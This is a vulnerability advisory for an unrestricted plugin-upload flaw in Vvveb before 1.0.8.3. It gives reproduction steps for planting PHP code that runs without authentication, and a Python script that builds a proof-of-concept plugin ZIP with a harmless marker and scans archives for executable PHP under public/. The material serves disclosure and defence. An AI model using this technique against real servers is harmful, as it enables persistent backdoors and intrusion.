Vvveb Unrestricted File Upload Vulnerability Leading to Remote Code Execution
Vulnerability
A vulnerability allowing unrestricted file uploads has been identified in Vvveb versions prior to 1.0.8.3. It resides in the plugin upload endpoint: a user with the super_admin role can upload a plugin ZIP file containing arbitrary PHP code, and the archive is installed without its contents being restricted. Exploitation involves crafting a ZIP file that includes a plugin.php file with a valid Slug header and a public/index.php file containing the attacker's PHP code. Once the plugin is installed, that code runs as the web server user whenever the plugin's public path is requested over HTTP, and those requests require no authentication.
Impact
Exploitation results in remote code execution on the server, with the attacker's code running as the web server user. Installing the plugin requires super_admin credentials, but triggering the installed code does not: any unauthenticated client that can reach the plugin's public path can execute it, so a compromised or malicious super_admin account can leave behind a persistent, anonymously reachable backdoor in the installed plugin files.
Reproduction
With super_admin credentials, upload a ZIP file through the plugin upload endpoint that contains a plugin.php file whose header declares a valid Slug and a public/index.php file with the PHP code to execute (a benign marker, such as echoing a fixed string, is enough to confirm the issue). After the upload, request the plugin's public path without authenticating; the PHP code in public/index.php executes and its output is returned in the response.
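The following script is an added example written for this page; it is not part of the original advisory or of the Vvveb project. It builds the plugin archive the reproduction describes (using a harmless marker instead of a real payload) and, for the defensive side, scans a plugin ZIP before installation and flags entries that a PHP handler would execute under the plugin's public/ path. The plugin.php header layout (a comment block with a "Slug:" line), the root-level placement of plugin.php and public/, and the list of PHP-handled extensions are assumptions, not details taken from the advisory; the upload endpoint itself is not named on the page and is left to the tester.

```python
"""Worked example for the Vvveb plugin-upload advisory.

Added example, not code from the advisory or from the Vvveb project.
Assumptions (not stated on the page): WordPress-style header block in
plugin.php with a "Slug:" line, plugin.php and public/ at the archive
root, and the extension list a typical PHP handler config maps to PHP.
"""
import io
import re
import zipfile
from typing import Optional

# Assumed header layout; the advisory only says the Slug header must be valid.
PLUGIN_HEADER = """<?php
/*
Name: {name}
Slug: {slug}
Description: proof-of-concept plugin for the unrestricted upload advisory
Version: 0.0.1
*/
"""

# Benign marker used in place of an actual webshell.
POC_PAYLOAD = "<?php echo 'vvveb-upload-poc'; ?>\n"

# Extensions a typical Apache/nginx + PHP-FPM setup hands to PHP (assumed).
PHP_EXTENSIONS = (".php", ".php3", ".php4", ".php5", ".php7", ".phtml", ".phar")

# Slug charset a deployer would reasonably allow (assumption).
SLUG_RE = re.compile(r"^[a-z0-9][a-z0-9-]{0,63}$")


def build_zip(entries: dict) -> bytes:
    """Return an in-memory ZIP whose members are the given name -> text pairs."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, text in entries.items():
            zf.writestr(name, text)
    return buf.getvalue()


def build_plugin_zip(slug: str, payload: str = POC_PAYLOAD) -> bytes:
    """Build the archive shaped as the reproduction section describes."""
    if not SLUG_RE.match(slug):
        raise ValueError(f"slug {slug!r} is not a safe plugin slug")
    return build_zip({
        "plugin.php": PLUGIN_HEADER.format(name=slug, slug=slug),
        "public/index.php": payload,
    })


def parse_slug(plugin_php: str) -> Optional[str]:
    """Extract the Slug header value from plugin.php source, if present."""
    m = re.search(r"^\s*Slug:\s*(\S+)\s*$", plugin_php, re.MULTILINE)
    return m.group(1) if m else None


def find_public_php_entries(zip_bytes: bytes) -> list:
    """List members under public/ that a PHP handler would execute.

    Entries with path traversal or absolute names are flagged too, since
    they let a plugin write outside its own directory on extraction.
    """
    flagged = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            name = info.filename
            if name.startswith("/") or ".." in name.split("/"):
                flagged.append(name)
                continue
            if name.endswith("/"):  # directory entry
                continue
            parts = name.lower().split("/")
            # "public/..." at the root or "<dir>/public/..." one level down
            if "public" in parts[:-1] and parts[-1].endswith(PHP_EXTENSIONS):
                flagged.append(name)
    return flagged


def is_safe_plugin_zip(zip_bytes: bytes) -> bool:
    """Pre-install gate: require plugin.php with a sane slug and no PHP in public/."""
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        if "plugin.php" not in zf.namelist():
            return False
        slug = parse_slug(zf.read("plugin.php").decode("utf-8", "replace"))
    if slug is None or not SLUG_RE.match(slug):
        return False
    return not find_public_php_entries(zip_bytes)


if __name__ == "__main__":
    poc = build_plugin_zip("upload-poc")
    with open("upload-poc.zip", "wb") as fh:
        fh.write(poc)
    print("flagged entries:", find_public_php_entries(poc))
    print("safe to install:", is_safe_plugin_zip(poc))
```

Running the script writes upload-poc.zip for the manual upload step and reports that public/index.php is flagged. The scanner is a deployer-side gate, not the fix shipped in 1.0.8.3: it rejects a plugin archive that would place PHP where the web server serves it without authentication, and it also refuses traversal and absolute member names, which are the other common way a ZIP install turns into code execution.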
Remediation
Users are advised to update to Vvveb version 1.0.8.3 or later, where this vulnerability has been addressed. Updating does not remove plugins that were installed before the fix, so deployments that may have been exposed should also review the installed plugins for unexpected PHP files under their public directories and audit super_admin activity around plugin uploads.
